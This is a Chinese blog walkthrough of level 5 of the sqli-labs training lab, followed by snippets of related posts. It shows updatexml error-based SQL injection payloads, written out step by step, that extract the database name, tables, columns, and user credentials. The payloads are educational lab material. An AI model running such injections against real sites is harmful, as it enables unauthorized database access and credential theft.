sqli-labs第五关sql注入流程(重点讲updatexml函数的特性)

已于 2023-05-11 12:01:42 修改
阅读量542 收藏
点赞数
文章标签: sql 数据库 web安全
于 2023-05-09 14:04:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74798594/article/details/130578068
版权

一、注入点测试

测试id=1,没有显示数据

?id=1

 加上单引号后,发现会返回报错信息,且可以知道是单引号闭合的,可以考虑使用报错注入

?id=1'

使用报错的sql盲注有很多方法,本文使用updatexml函数的特性来进行报错注入

标准语法为:

  1. updatexml('XML_document','Xpath_string','New_value')

  2. //即

  3. updatexml('目标xml文件名','在xml中查询的字符串','替换后的值')

二、爆库名

?id=1' and updatexml(1,concat(1,database()),1)--+

注:三个1都可以换成任意值不影响,这里主要是利用xpath的语法来爆相关数据

 三、爆表名

?id=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security')),1)--+

 四、爆列名

?id=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name = ‘users’)),1)--+

五、爆字段内容

?id=1' and updatexml(1,concat(1,(select username from users limit 1,1),0,(select password from users limit 1,1)),1)--+

注:limit 1,1中前面的1可以换0,2,3...   帐号和密码中间的0是为了将二者分别开,没有特殊含义

#另一种写法

?id=1' and updatexml(1,concat(1,substr((select group_concat(username,password) from users),1,31)),1)--+

这个只能获取一部分数据,获取后续的数据可改为:

?id=1' and updatexml(1,concat(1,substr((select group_concat(username,password) from users),31,100)),1)--+

另一种写法大家也可以尝试一下,这里就不放图了ovo

早川奈子ovo
关注
sqlilabs第五
wh1sper、的博客
04-02 1355
文章目录前言一、二次注入二、别的方法三、sqlmap 前言 本来这篇博客前几天就准备写,奈何因为各种原因拖到了现在,然后参加ctf又白给 不说了,都是泪。(流眼泪.jpg) 如有错误希望各位师傅指正(拜托.jpg) 一、二次注入 本次采用的靶场为sqlilabs的第五题。 题目明确说了是二次注入。 输入?id=1’ http://127.0.0.1/sqli-labs-master/Less-5/?id=1' 判断字段数 输入?id=1’ order by 4 %23 发现只有三个字段 http://1
sqli-labs第五sql注入流程
qq_33598708的博客
03-30 5759
正常访问 http://127.0.0.1/sqli-labs-master/less-5/?id=1 判断注入类型 http://127.0.0.1/sqli-labs-master/less-5/?id=1' and 1=2 根据报错可以知道是字符注入,使用 ' 进行闭合。 通过 ' 闭合查询无返回的数据,无论是有数据返回还是无数据返回页面都不会显示相的数据。 所以这重点是盲注。 http://127.0.0.1/sqli-labs-master/less-5/?id=
sqli-labs-----第五
wyzhxhn的博客
11-06 876
单引号字符型updatexml报错注入
SQL报错注入之updatexml
最新发布
2301_78549931的博客
08-05 939
第一个参数:XML的内容第二个参数:是需要update的位置XPATH路径第三个参数:是更新后的内容所以第一和第三个参数可以随便写,只需要利用第二个参数,他会校验你输入的内容是否符合XPATH格式,当我们输入一个不符合xpath语法的语句就报错了,我们注入利用的就是这一点。
sqli-labs 第五
m0_63711447的博客
04-01 4569
第五可以用很多种方法来做,报错型注入,二次查询注入等,这里用布尔盲注手工注入的方法来做 Less -5 1、输入?id=1,显示you are in 将1改为3,5等数字,仍然得相同结果,改为100,发现没有回显,由此可知正确的情况下会返回you are in,错误的情况下没有返回, 输入?id=1',出现报错信息,由此判断存在注入漏洞 2、使用order by 语句进行查列,order by 3的时候正常回显,order by 4无回显,说明有三列 3、对于这题不能使用联合查询,无.
sqli-labs---第五
2201_75556700的博客
05-22 651
7、查询email_id中的值(这里就拿到了用户email信息)根据页面的提示可以知道这是单引号'的闭合方式,并且是报错注入。5、查字段USER中的信息,这里查不出来,那就换一张表。id=1(没有正常显示)提示了一串字符。6、查询emails 这张表中的字段信息。3、查询表名(看到敏感表users)4、查询users表中字段的信息。id=1'(出现了错误提示)
SQL注入——sqli-labs第五
lizhiiiii的博客
01-29 661
使用floor报错语句注入
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
jeakinscheung-sqli-labs-php7-master.zip
03-16
在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室(Sqli Labs)代码仅适用于PHP5,而许多开发者现在正在使用PHP7。这引发了两个主要的知识点:PHP版本兼容性和SQL注入的防范。 ...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
sqlilabs过手册注入天书,过sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
sqli-labs系列——第五(二次查询注入)
1匹黑马
04-26 7013
文章目录判断注入什么是二次查询注入rand()函数floor()函数concat()函数group by语句count()函数开始注入exp 判断注入 一开始我以为这是一个常规的sql盲注,操作之后发现事情并没有那么简单,为了方便学习,我直接把sql语句输出出来了: 然后就去看题目名称,Double Injection(双查询注入),就明白怎么回事了。 什么是二次查询注入 双查询注入其实就是一个...
sqli-labs通(五)
qq_65950075的博客
04-30 886
但是这一没有回显信息,输入正确就会出现以下信息,错误则会报错,说明存在布尔盲注,我们可以利用这个来进行判断。函数 substr(a,b,c),a是截取的字符串 ,b是截取的位置 ,c是截取的长度。length()函数是返回字符串的长度,先暂且猜测数据库名长度是1。开始攻击,8的返回长度不一样,所以猜测数据库名的长度就是8。然后就是逐个爆破后面字母,直到把8个字母的库名爆出来,但是。然后我们验证,显示正常,说明数据库名长度就是8。设置类型为数值,从1到20,步长为1。id=1,只有下面这种结果。
基于Sqli-Labs靶场的SQL注入-第五重点双查询注入)
Joker
11-19 4134
双查询是指两个查询语句的嵌套,也就是一个select语句中在去套一个select语句,然后利用group by 语句和floor函数的结合去报错,再将我们需要的信息显示到报错信息中。
Sqli-labs靶场第5详解[Sqli-labs-less-5]
m0_73615178的博客
02-20 1656
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()sql注入——报错注入(Error-based)
SQL注入之错误注入_基于updatexml()的脱库原理
热门推荐
wangyuxiang946的博客
06-21 1万+
updatexml()的基本用法、报错原理及脱库步骤
sqlilabs第五布尔盲注(burpsuite版)
qq_62044589的博客
04-04 1963
sqlilabs第五单引号闭合布尔盲注burpsuite。
iwebsec靶场SQL注入-updatexml注入
qq_56041380的博客
03-27 479
updatexml注入也是一种报错注入,它利用updatexml函数中的第二个参数Xpath_string的报错进行注入。Xpath_string是XML文档路径,格式是/XXX/XXX/XXX/,如果格式不正确就会报错。
搭建RHEL-7 SQLi-Labs平台,实践SQL注入练习
SQLi-Labs是一个专业的SQL注入练习平台,可用于GET和POST场景,其中包括多种类型的注入漏洞。 首先,SQLi-Labs提供了基于错误的注入(Union Select)和基于误差的注入(双查询注入)等注入漏洞练习。这些练习旨在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值